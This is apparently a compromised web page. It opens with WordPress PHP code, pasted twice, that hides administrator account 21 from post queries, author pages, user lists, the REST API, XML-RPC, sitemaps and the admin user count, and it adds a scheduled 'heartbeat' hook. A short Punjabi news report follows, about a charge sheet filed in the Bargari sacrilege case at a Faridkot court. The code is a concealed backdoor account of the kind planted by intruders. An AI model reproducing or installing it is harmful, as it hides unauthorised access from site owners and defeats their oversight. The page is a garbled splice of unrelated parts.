add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
ਬਰਗਾੜੀ ਬੇਅਦਬੀ ਮਾਮਲੇ ਵਿੱਚ ; ਵਿਸ਼ੇਸ਼ ਜਾਂਚ ਟੀਮ ਵੱਲੋਂ ਫਰੀਦਕੋਟ ਅਦਾਲਤ ਅੱਗੇ ਚਲਾਨ ਪੇਸ਼ - Press Ki Taquat
No Result
View All Result
ਚੰਡੀਗੜ, 9 ਜੁਲਾਈ (ਸ਼ਿਵ ਨਾਰਾਇਣ ਜਾਂਗੜਾ) : ਬੇਅਦਬੀ ਘਟਨਾਵਾਂ ਦੀ ਜਾਂਚ ਲਈ ਬਣਾਈ ਗਈ ਵਿਸ਼ੇਸ਼ ਜਾਂਚ ਟੀਮ (ਐਸ.ਆਈ.ਟੀ.) ਵੱਲੋਂ ਅੱਜ ਸ੍ਰੀ ਗੁਰੂ ਗ੍ਰੰਥ ਸਾਹਿਬ ਦੀ ਬੇਅਦਬੀ ਦੇ ਮਾਮਲੇ ਵਿੱਚ ਜੇ.ਐਮ.ਆਈ.ਸੀ. ਫਰੀਦਕੋਟ ਦੀ ਅਦਾਲਤ ਵਿੱਚ ਪਹਿਲਾ ਚਲਾਨ ਪੇਸ਼ ਕੀਤਾ ਗਿਆ।
ਇਸ ਸਬੰਧੀ ਜਾਣਕਾਰੀ ਦਿੰਦਿਆਂ ਐਸ.ਆਈ.ਟੀ. ਮੁਖੀ ਅਤੇ ਆਈ.ਜੀ.ਪੀ. ਬਾਰਡਰ ਰੇਂਜ ਅੰਮਿ੍ਰਤਸਰ ਐਸ.ਪੀ.ਐਸ. ਪਰਮਾਰ ਨੇ ਦੱਸਿਆ ਕਿ 12 ਅਕਤੂਬਰ, 2015 ਨੂੰ ਬਰਗਾੜੀ ਵਿਖੇ ਸ੍ਰੀ ਗੁਰੂ ਗ੍ਰੰਥ ਸਾਹਿਬ ਦੇ ਸਰੂਪ ਖਿਲਾਰ ਕੇ ਬੇਅਦਬੀ ਕਰਨ ਦੇ ਮਾਮਲੇ ਵਿੱਚ ਗਿ੍ਰਫ਼ਤਾਰ ਕੀਤੇ ਗਏ 6 ਮੁਲਜ਼ਮਾਂ ਖ਼ਿਲਾਫ਼ ਚਲਾਨ ਪੇਸ਼ ਕੀਤਾ ਗਿਆ ਹੈ ਅਤੇ ਇਸ ਮਾਮਲੇ ਵਿੱਚ ਅਗਲੀ ਸੁਣਵਾਈ 20 ਜੁਲਾਈ ਤੈਅ ਕੀਤੀ ਗਈ ਹੈ।ਆਈ.ਜੀ.ਪੀ. ਨੇ ਦੱਸਿਆ ਕਿ ਐਸ.ਆਈ.ਟੀ. ਨੇ 16.05.21 ਨੂੰ ਜਾਂਚ ਸ਼ੁਰੂ ਕਰਨ ਸਬੰਧੀ ਇਲਾਕਾ ਮੈਜਿਸਟਰੇਟ ਨੂੰ ਸੂਚਿਤ ਕਰਨ ਤੋਂ ਬਾਅਦ ਇਸ ਕੇਸ ਵਿੱਚ ਲੋੜੀਂਦੇ ਸਾਰੇ ਮੁਲਜ਼ਮਾਂ ਨੂੰ ਗਿ੍ਰਫ਼ਤਾਰ ਕਰ ਲਿਆ ਸੀ।
ਗੌਰਤਲਬ ਹੈ ਕਿ ਗੁਰਦੁਆਰਾ ਸਾਹਿਬ ਬਰਗਾੜੀ ਦੇ ਮੈਨੇਜਰ ਕੁਲਵਿੰਦਰ ਸਿੰਘ ਦੇ ਬਿਆਨ ’ਤੇ ਮੁਲਜ਼ਮਾਂ ਖਿਲਾਫ਼ ਆਈ.ਪੀ.ਸੀ. ਦੀ ਧਾਰਾ 295, 295-ਏ, 153-ਏ, 201, 120-ਬੀ ਤਹਿਤ ਥਾਣਾ ਬਾਜਾਖਾਨਾ ਵਿਖੇ ਐਫ.ਆਈ.ਆਰ. ਨੰਬਰ. 128 ਮਿਤੀ 12.10.2015 ਦਰਜ ਕੀਤੀ ਗਈ ਸੀ।
ਦੱਸਣਯੋਗ ਹੈ ਕਿ ਹਾਈ ਕੋਰਟ ਵੱਲੋਂ ਪੰਜਾਬ ਪੁਲਿਸ ਨੂੰ ਇਹ ਕੇਸ ਸੌਂਪੇ ਜਾਣ ਤੋਂ ਬਾਅਦ ਆਈ.ਜੀ.ਪੀ. ਬਾਰਡਰ ਰੇਂਜ ਅੰਮਿ੍ਰਤਸਰ ਐਸ.ਪੀ.ਐਸ. ਪਰਮਾਰ ਦੀ ਅਗਵਾਈ ਹੇਠ ਇਸ ਵਿਸ਼ੇਸ਼ ਜਾਂਚ ਟੀਮ ਦਾ ਗਠਨ ਕੀਤਾ ਗਿਆ, ਜਿਸ ਵਿਚ ਰਜਿੰਦਰ ਸਿੰਘ ਸੋਹਲ, ਏਆਈਜੀ / ਸੀਆਈ ਪੰਜਾਬ, ਲਖਬੀਰ ਸਿੰਘ, ਏਸੀਪੀ / ਈਆਰਐਸ ਅੰਮਿ੍ਰਤਸਰ ਅਤੇ ਇੰਸਪੈਕਟਰ ਦਲਬੀਰ ਸਿੰਘ, ਆਈਸੀ ਸੀ.ਆਈ.ਏ. ਫਰੀਦਕੋਟ ਅਤੇ ਹੋਰਾਂ ਨੂੰ ਮੈਂਬਰ ਵਜੋਂ ਸ਼ਾਮਲ ਕੀਤਾ ਗਿਆ।
ਬੁਲਾਰੇ ਨੇ ਦੱਸਿਆ ਕਿ ਗਿ੍ਰਫਤਾਰ ਕੀਤੇ ਗਏ ਛੇ ਮੁਲਜ਼ਮਾਂ ਦੀ ਪਹਿਚਾਣ ਸੁਖਜਿੰਦਰ ਸਿੰਘ ਉਰਫ ਸਨੀ, ਸ਼ਕਤੀ ਸਿੰਘ, ਰਣਜੀਤ ਸਿੰਘ ਉਰਫ ਭੋਲਾ, ਬਲਜੀਤ ਸਿੰਘ, ਨਿਸ਼ਾਨ ਸਿੰਘ ਅਤੇ ਪਰਦੀਪ ਸਿੰਘ ਵਜੋਂ ਹੋਈ ਹੈ।
ਜ਼ਿਕਰਯੋਗ ਹੈ ਕਿ ਉਪਰੋਕਤ ਕੇਸ ਦੀ ਜਾਂਚ 2.11.2015 ਨੂੰ ਸੀ.ਬੀ.ਆਈ. ਨੂੰ ਸੌਂਪ ਦਿੱਤੀ ਗਈ ਸੀ, ਜਿਸ ਤੋਂ ਬਾਅਦ ਪੰਜਾਬ ਸਰਕਾਰ ਨੇ 6.09.2018 ਨੂੰ ਸੀ.ਬੀ.ਆਈ. ਤੋਂ ਬੇਅਦਬੀ ਮਾਮਲਿਆਂ ਦੀ ਜਾਂਚ ਵਾਪਸ ਲੈਣ ਸਬੰਧੀ ਨੋਟੀਫਿਕੇਸ਼ਨ ਜਾਰੀ ਕੀਤਾ। ਸੀ.ਬੀ.ਆਈ. ਨੇ 4.07.2019 ਨੂੰ ਤਿੰਨੋ ਮਾਮਲਿਆਂ ਵਿਚ ਜੁਆਇੰਟ ਕਲੋਜ਼ਰ ਰਿਪੋਰਟ ਪੇਸ਼ ਕੀਤੀ ਸੀ।
ਬੁਲਾਰੇ ਨੇ ਅੱਗੇ ਦੱਸਿਆ ਕਿ ਬਾਅਦ ਵਿੱਚ ਪੰਜਾਬ ਅਤੇ ਹਰਿਆਣਾ ਹਾਈ ਕੋਰਟ ਨੇ ਇਸ ਕੇਸ ਦੀ ਜਾਂਚ ਪੰਜਾਬ ਪੁਲਿਸ ਨੂੰ ਸੌਂਪ ਦਿੱਤੀ ਸੀ।
Post Views: 107
No Result
View All Result